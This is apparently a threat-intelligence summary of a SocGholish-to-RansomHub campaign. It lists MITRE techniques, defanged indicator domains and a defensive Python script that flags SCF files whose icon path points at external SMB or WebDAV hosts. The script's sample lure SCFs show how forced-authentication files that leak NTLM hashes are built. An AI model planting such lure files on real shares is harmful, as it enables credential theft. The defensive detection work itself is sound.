Campaign Trail: SocGholish: From loader and C2 activity to RansomHub deployment
by Christina Kreza

Ransomware operations are evolving, increasingly relying on affiliate models with initial access brokers, notably those using the SocGholish loader. SocGholish delivers follow-on payloads that have led to RansomHub ransomware deployments, and the operators abuse legacy protocols for credential access.
Affected: ransomware sector, corporate environments

Key points:

  • Ransomware operations increasingly use compartmentalized affiliate models.
  • SocGholish is a loader malware utilized for initial access through compromised websites.
  • Targeted websites often include outdated CMS platforms like WordPress.
  • SocGholish leads to connections with RansomHub ransomware.
  • Malware uses obfuscated code and TDS to evade detection.
  • Credential access tactics include exploiting WebDAV and malicious SCF file interactions.
  • Attackers leverage legacy protocols to extract NTLM hashes.
  • Innovative post-exploitation practices are evident, including lateral movement.
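
The credential-access technique listed above abuses SCF files whose icon path points at an attacker-controlled SMB or WebDAV host, so that Explorer authenticates outbound and leaks an NTLM hash. The following triage script is an added example for defenders, not code from the Darktrace report: it parses SCF contents, extracts the IconFile target, and flags files whose icon is fetched from a host outside the organisation. The sample SCF contents, the internal ranges and the `.corp.example` suffix are constructed assumptions.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample SCF files (not from the report). A benign SCF references
# a local resource; a lure points IconFile at a UNC path on an outside host,
# optionally with an @port suffix that routes the request over WebDAV.
SAMPLES = {
    "desktop.scf": "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n",
    "invoice.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\203.0.113.25\\share\\icon.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n",
    "readme.scf": "[Shell]\r\nIconFile=\\\\fileserver01.corp.example\\icons\\a.ico\r\n",
    "webdav.scf": "[Shell]\r\nIconFile=\\\\example-webdav.test@80\\DavWWWRoot\\x.ico\r\n",
}

# Assumed internal address space and DNS suffix; adjust to the environment.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
INTERNAL_SUFFIXES = (".corp.example",)

# Matches "IconFile=\\host\..." or "IconFile=\\host@port\..." (WebDAV form).
UNC_RE = re.compile(r"^\s*IconFile\s*=\s*\\\\([^\\@]+)(?:@(\d+))?\\", re.IGNORECASE | re.MULTILINE)


def remote_icon_host(scf_text):
    """Return (host, port_or_None) from a UNC IconFile entry, or None if the icon is local."""
    m = UNC_RE.search(scf_text)
    return (m.group(1), m.group(2)) if m else None


def is_internal(host):
    """True if host is an internal IP address or carries an internal DNS suffix."""
    try:
        return any(ip_address(host) in net for net in INTERNAL_NETS)
    except ValueError:
        return host.lower().endswith(INTERNAL_SUFFIXES)


def classify(scf_text):
    """Verdict for one SCF: local, internal, external-smb or external-webdav."""
    target = remote_icon_host(scf_text)
    if target is None:
        return "local"
    host, port = target
    if is_internal(host):
        return "internal"
    return "external-webdav" if port else "external-smb"


def scan(samples):
    """Classify every SCF in a {name: contents} mapping."""
    return {name: classify(text) for name, text in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name}: {verdict}")
```

Anything classified as external-smb or external-webdav on a writable share is worth treating as a forced-authentication lure and correlating with outbound SMB/WebDAV connection attempts from the hosts that browsed that share.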

MITRE Techniques:

  • Credential Access – T1187: Forced Authentication via WebDAV and SCF files to capture NTLM hashes.
  • Credential Access – T1110: Brute Force authentication attempts observed.
  • Command and Control – T1071.001: Utilization of Web Protocols for C2 communication.
  • Command and Control – T1571: Non-Standard Port usage for evading detection.
  • Discovery – T1083: File and Directory Discovery conducted for internal recon.
  • Discovery – T1018: Remote System Discovery executed post-infection.
  • Discovery – T1046: Network Service Discovery to enable lateral movement.
  • Discovery – T1135: Network Share Discovery to exploit shared resources.
  • Execution – T1059.007: JavaScript execution for malicious payload delivery.
  • Lateral Movement – T1021.002: Utilization of SMB/Windows Admin Shares for lateral movement.
  • Resource Development – T1608.004: Stage Capabilities: Drive-by Target for initial access.

Indicators of Compromise:

  • [Domain] garagebevents[.]com (IP: 35.203.175[.]30) – Possibly compromised website
  • [Domain] packedbrick[.]com (IP: 176.53.147[.]97) – Keitaro TDS domain for SocGholish Delivery
  • [Domain] rednosehorse[.]com (IP: 176.53.147[.]97) – Keitaro TDS domain for SocGholish Delivery
  • [Domain] blackshelter[.]org (IP: 176.53.147[.]97) – Keitaro TDS domain for SocGholish Delivery
  • [Domain] blacksaltys[.]com (IP: 176.53.147[.]97) – Keitaro TDS domain for SocGholish Delivery

Full Story: https://darktrace.com/blog/socgholish-from-loader-and-c2-activity-to-ransomhub-deployment